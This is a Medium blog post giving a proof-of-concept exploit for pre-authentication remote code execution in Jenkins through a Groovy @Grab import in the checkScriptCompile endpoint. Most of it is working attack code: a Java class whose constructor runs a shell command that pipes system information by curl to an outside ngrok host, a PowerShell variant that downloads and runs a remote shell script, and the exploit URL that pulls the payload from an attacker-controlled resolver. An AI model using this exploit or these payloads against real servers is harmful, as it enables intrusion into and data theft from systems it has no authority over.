Jenkins RCE PoC or simple pre-auth remote code execution on the Server.

http://example.com/jenkins/securityRealm/user/admin/
Jenkins User Id: admin
  1. Saved that code as Orange.java:
public class Orange {
public Orange(){
try {
String payload = "uname -a | curl -d @- http://myservertunnel.ngrok.io/";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) { }
}
}
uname -a | curl -d @- http://myservertunnel.ngrok.io/
javac -target 1.8 Orange.java
./Orange.java
./Orange.class
./META-INF
./META-INF/services
./META-INF/services/org.codehaus.groovy.plugins.Runners
Just screenshot of all required steps to make your POC (without -target 1.8)
http://example.com/jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)
@GrabResolver(name='orange.tw', root='http://myservertunnel.ngrok.io/')
@Grab(group='tw.orange', module='poc', version='1')
import Orange;
{
"column": 0,
"line": 0,
"message": "",
"status": "success"
}
public class Orange {
public Orange(){
try {
String payload = "powershell iex(new-object net.webclient).downloadstring('http://yourserver.com/shell.ps1')";
String[] cmds = {"cmd", "/c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) { }
}
}

References

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Microservice Authentication

Pygame tutorial #3: rendering images, drawing background for the text.

Flutter- MQTT

Frontend Capstone

Binder Architecture and Core Components

How to Build a Portable Platform Independent Web Server in Java

JIRA Reporting for Multiple Teams

Notion loves JIRA

What happens when you type ls -l in the shell.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Valeriy Shevchenko

Valeriy Shevchenko

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

More from Medium

HackTheBox — Previse Writeup

TryHackMe Writeup — Jason

How to use in-built docker tools for reconnaissance

[Offensive security] How toconduct server-side request forgery (SSRF)